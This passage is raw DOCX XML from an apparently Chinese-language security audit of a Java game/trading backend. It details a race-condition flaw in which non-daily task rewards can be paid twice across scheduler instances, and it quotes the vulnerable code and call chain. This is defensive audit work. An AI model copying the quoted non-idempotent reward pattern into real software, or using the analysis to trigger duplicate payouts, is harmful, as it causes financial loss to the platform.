          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 悲观锁，确保"检查-发奖-标记完成"的原子性。</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344"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.firstTradeTask → TaskExecutionService.java.updateProgress → UserTaskRecord.java.setTaskId</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audit_m265_1229_firstTradeTask_ctrl-path16of29.md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：TaskExecutionService.java#updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_63" w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞62：非每日任务奖励发放缺乏幂等保护，多实例并发场景下可重复领取奖励</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1345"/>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：非每日任务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskType≠1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）奖励发放缺乏幂等防重，并发或集群部署下同一用户可重复触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1346"/>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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1347"/>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：业务逻辑 / 并发竞态（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1348"/>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349"/>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：无需外部权限（由定时任务自动触发，攻击面在多实例/集群部署层）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1350"/>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updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对每日任务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskType=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）和非每日任务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskType≠1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）采取了截然不同的幂等保护策略：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日任务分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：在调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前，先 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 一条带唯一约束的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DailyTaskAwardIssued</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录，并通过捕获 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DataIntegrityViolationException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 防止并发重复发奖——这是正确的防重设计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>非每日任务分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecord.getStatus() &gt;= 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断是否已完成，随后直接调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最后才</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecordRepository.save(userTaskRecord)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将状态写回数据库。整个流程是"先发奖、后落库"，且无任何唯一约束或乐观锁（版本号/CAS）保护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在以下两种场景下，该设计缺陷可被触发：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>场景一：多实例/集群部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（最高风险）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>firstTradeTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Scheduled(fixedRate = ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方式在每个应用实例上独立运行，无分布式互斥锁。若部署了两个或以上实例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1353"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个实例同时执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByHasTradedAndIsNewUserAndOpenIdIsNotNull(0, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，查询到同一批 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的用户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1354"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个实例几乎同时对同一用户调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>coinWService.firstTrade(openId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 均返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，且此时 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍为 0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1355"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个实例均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.setHasTraded(1); userRepository.save(user)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 均成功（数据库层面 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段无唯一约束保护，最后写入者覆盖，不抛异常）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1356"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个实例均调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(user.getId(), "4", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，各自开启独立事务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1357"/>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READ_COMMITTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 隔离级别下，两个事务几乎同时读取到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecord.status &lt; 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（第一个事务尚未提交），均通过状态检查，均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward(userId, task.getId())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同一用户的同一任务奖励被发放两次</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场景二：单实例 `fixedRate` 超时重叠</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若某次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>firstTradeTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行时间超过 10 分钟（用户量大、网络抖动），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>fixedRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会触发下一次执行，产生同一方法的并发执行，同一用户在两个调用链中均满足条件，产生与场景一相同的双重奖励。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1358"/>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[定时任务，每10分钟，fixedRate]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  UserScheduler.firstTradeTask</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ├─ userRepository.findByHasTradedAndIsNewUser...()  ← 查询 hasTraded=0 的用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ├─ coinWService.firstTrade(openId)                  ← 外部接口判断是否已首次交易</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ├─ userRepository.save(user)                        ← 设置 hasTraded=1（独立事务，无分布式锁）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      └─ taskExecutionService.updateProgress(userId, "4", 1)  ← 进入非每日任务分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">  </w:t>
              <w:br/>
              <w:t xml:space="preserve">  TaskExecutionService.updateProgress [@Transactional]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ├─ findByUserIdAndTaskId(userId, taskId)            ← 无锁读取，status 可能仍 &lt;2</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ├─ status 检查（status &lt; 2，通过）                  ← TOCTOU 窗口</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ├─ applyReward(userId, taskId)                      ← ⚠️ 奖励在此处发放，写库在后</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">      └─ userTaskRecordRepository.save(record)            ← status=2 此时才落库，过晚</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1359"/>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r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 所发放的奖励在该游戏/交易平台上具有实际价值（据上下文，至少涉及 USDT 奖池相关资产）。每次双重发奖将导致平台多支出一份任务奖励。在集群部署下，所有满足 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 条件的用户均面临此风险，可批量放大损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>❌ 存在漏洞的代码（含调用链关键片段）：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定时任务入口：UserScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 10 * 60 * 1000L)</w:t>
              <w:br/>
              <w:t>public void firstTradeTask() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    var users = userRepository.findByHasTradedAndIsNewUserAndOpenIdIsNotNull(0, 0); // ← 多实例并发查询同一批用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (User user : users) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            boolean traded = coinWService.firstTrade(openId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Integer hasTraded = user.getHasTraded();</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (traded &amp;&amp; hasTraded == 0) {                   // ← 两个实例均满足条件（TOCTOU窗口开始）</w:t>
              <w:br/>
              <w:t xml:space="preserve">                user.setHasTraded(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                userRepository.save(user);                    // ← 无分布式锁，两实例均能成功保存</w:t>
              <w:br/>
              <w:t xml:space="preserve">                taskExecutionService.updateProgress(user.getId(), "4", 1); // ← 两实例均进入下游</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) { }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：TaskExecutionService.java:updateProgress（非每日任务分支）</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void updateProgress(Long userId, String triggerCondition, int delta) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ---- 每日任务分支（有幂等保护，正确）----</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (taskType == 1) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            dailyTaskAwardIssuedRepository.save(new DailyTaskAwardIssued(userId, taskId, today)); // ← 唯一约束防重</w:t>
              <w:br/>
              <w:t xml:space="preserve">            applyReward(userId, task.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (DataIntegrityViolationException e) { /* 正确的幂等处理 */ }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
